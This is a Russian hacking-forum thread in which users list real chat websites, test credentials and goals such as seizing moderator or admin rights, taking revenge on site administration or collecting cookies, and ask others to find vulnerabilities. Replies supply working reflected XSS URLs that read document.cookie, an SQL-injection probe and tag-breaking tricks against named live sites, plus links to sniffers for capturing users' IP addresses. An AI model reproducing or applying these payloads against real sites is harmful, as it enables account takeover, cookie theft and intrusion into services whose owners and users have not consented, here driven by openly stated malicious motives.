Проверка на уязвимости

Discussion in 'Песочница' started by Koller, 11 Apr 2007.

Thread Status:
Not open for further replies.
  1. ege-ege

    ege-ege New Member

    Joined:
    3 Dec 2007
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Снифферы

    Пользуйтесь снифферами господа. Это поможет Вам стопроцентно определить IP для начала любого пользователя в чате, а уже потом сломать хоть кого и хоть как в 100 процентов проше. Вот адрес с двумя снифферами: http://www1.hut.ru/aneksniff
     
  2. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    Рекомендую сниффер GreenBear-a: http://s.netsec.ru/ ---> IMHO наилучший =)
     
  3. serg88

    serg88 Elder - Старейшина

    Joined:
    30 Jul 2006
    Messages:
    144
    Likes Received:
    73
    Reputations:
    -5
    Cори неувидел соответствующей темы - парни подбольтайте программу или дайте название - -- нужна работа через проксю по 80 - 8060 портам вопщем н а чат заходить - желательно чтоб обновлялся список проксей и все качественно работало - помогите плис :) с меня плюс

    ЗЫ
    использовал раньше SocksChain но он чото так тупит всегда - а на новые версии нету коряков - можно и его если у кого есть - цынкуйте в пм ;)
     
    #43 serg88, 6 Dec 2007
    Last edited: 6 Dec 2007
  4. NFL

    NFL New Member

    Joined:
    28 Dec 2007
    Messages:
    2
    Likes Received:
    1
    Reputations:
    0
    1. http://chat.sumclub.tv/chat
    2. не знаю, чат самописный
    3. Хочу получить права модера/одмина, чтобы отомстить администрации
    4. Логин: Tester
    пароль 1111
     
    1 person likes this.
  5. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    мда, только ленивый там шелла не имеет, пароль админа "закодирован" base64 в админке php скрипты через видео файлы заливаются
     
  6. NFL

    NFL New Member

    Joined:
    28 Dec 2007
    Messages:
    2
    Likes Received:
    1
    Reputations:
    0
    И как мну это удобно использовать? как можно равкодировать 64 бейс? ни разу не приходилось...
     
  7. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    PHP:
    <?
    echo 
    base64_decode('строчка');
    ?>
     
    _________________________
    1 person likes this.
  8. информ+

    информ+ New Member

    Joined:
    8 Jan 2008
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    1) http://da.zp.ua/
    2) Название движка неизвестно
    3) Я сам был модером, но мне перекрыли эту лавочку. Хотел бы зайти под ником модера или взломать пароль на модерской странице http://da.zp.ua/m
    4) ник: алиби пароль 257233
     
  9. На100ящий

    На100ящий Elder - Старейшина

    Joined:
    9 Jan 2008
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    1) www.lom.dp.ua
    2) Движок неизвестен
    3) на этом форуме нашёл пару примеров вот http://forum.antichat.ru/showthread.php?mode=hybrid&t=34944 но что это даёт и как применить непонимаю, обьясните плз
    4) Логин СМЕРТЬ пароль 321
     
  10. Gangrel

    Gangrel New Member

    Joined:
    13 Jan 2008
    Messages:
    2
    Likes Received:
    1
    Reputations:
    0
    1) http://chat.yugra.net
    2) Voodoo
    3) Необходимо найти какую либо уязвимость для повышения безопастности чата
    4) логин: Gungrave пароль: 173289224238947
     
    1 person likes this.
  11. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    =\
    Code:
    http://chat.yugra.net/password_reminder.php?look_for=%3Cscript%3Ealert(document.cookie);%3C/script%3E
     
  12. +Bam+

    +Bam+ New Member

    Joined:
    14 Jan 2008
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    1. http://miass.ru/chat/
    2.Незнаю, только начал изучать...
    3.Хочу ему что нибудь сделать, потому что седят там одни алени которые на мои сообщения пишут типо "это нам не интересно и т.п..." Вобщем какие нибудь неуезвимости а потом может сам разберусь...
    4. log: Venom ; pass: 123321
    Плюсик с меня...
     
  13. Gangrel

    Gangrel New Member

    Joined:
    13 Jan 2008
    Messages:
    2
    Likes Received:
    1
    Reputations:
    0
    Благодарю
     
  14. JayKa

    JayKa New Member

    Joined:
    19 Jan 2008
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Чат

    1) www.combats.ru
    2) неизвестно
    3) начиная от втавления картинок в чат и заканчивая сбором кукис
    4) Логин: woakiik
    Пароль: 0ok9ij

    Спасибо заранее)
     
  15. maksww

    maksww New Member

    Joined:
    22 Feb 2008
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    1) http://78.47.106.29
    2) tusa- chat
    3) Необходимо найти какую либо уязвимость для повышения безопастности чата.
    4) Логин: tester

    Пароль 999

    Заранее благодрю
     
  16. -KABAN-

    -KABAN- New Member

    Joined:
    19 Mar 2008
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    1) http://www.chat.astrakhan.ru
    2) скорее всего phpmychat
    3) root. admin, moder ну и прочие возможности, путь к базе login : pass.
    4) KAZAH : 333
    Обнаружил такой баг:
    В чате разрещены только 3 тэга: "<B><I><U>" (без кавычек)
    если в строке ввода сообщения написать следущее: "<b><i><u><http://</b></i></u>" (без кавычек), обратите внимание если оставить знак открытия тэга перед http:// то у всех посетителей чата будет жирный, курсивный или подчеркнутый шрифт, это зависит от перестановки местами тэгов, если в привате то только у того кому отправили и у вас соответственно, люди конечно возмущаются но толку мало))), баг не всегда, но снимается простой перезагрузкой страницы. Подскажите пожалуйста как правильно использовать эту уязвимость для моих вышеуказаных целей. Заранее спасибо))) :D
     
    #56 -KABAN-, 20 Mar 2008
    Last edited: 20 Mar 2008
  17. Horsekiller

    Horsekiller Elder - Старейшина

    Joined:
    22 Nov 2006
    Messages:
    61
    Likes Received:
    33
    Reputations:
    6
    вот пассивная ХСС
    Code:
    http://www.chat.astrakhan.ru/%3Cscript%3Ealert("Xek")%3C/script%3E
    Code:
    http://chat.astrakhan.ru/chat/users_popupH.php3?From=..%2Findex.php3&L=russian&LastCheck=1206018170'+order+by+100/*
    Нет времени копать сейчас =/
     
    #57 Horsekiller, 20 Mar 2008
    Last edited: 20 Mar 2008
  18. -KABAN-

    -KABAN- New Member

    Joined:
    19 Mar 2008
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Horsekiller
    Огромное спасибо)))))

    ну кто еще мне поможет))))))))))
     
  19. Sergey59

    Sergey59 New Member

    Joined:
    19 Mar 2008
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    1) www.gameland.ru/chat
    2) Неизвестно
    3) Хотелось бы завладеть правами админа.
    4) Чат без регистрации.

    Буду благодарен за помощ :)
     
    #59 Sergey59, 23 Mar 2008
    Last edited: 16 Apr 2008
  20. katala17

    katala17 New Member

    Joined:
    31 Mar 2008
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    очень надо найти уязвимости двух чатов http://sexchats.ru/
    а этот ваще без админа, но админка есть и вот ещё заходи вот так action=”www.citychat.spb.ru/chat.cgi и там требует пароль, зарание всем спасибо
     
Loading...
Similar Threads - Проверка уязвимости
  1. zase
    Replies:
    1
    Views:
    3,518
  2. Shadows_God
    Replies:
    14
    Views:
    7,956
Thread Status:
Not open for further replies.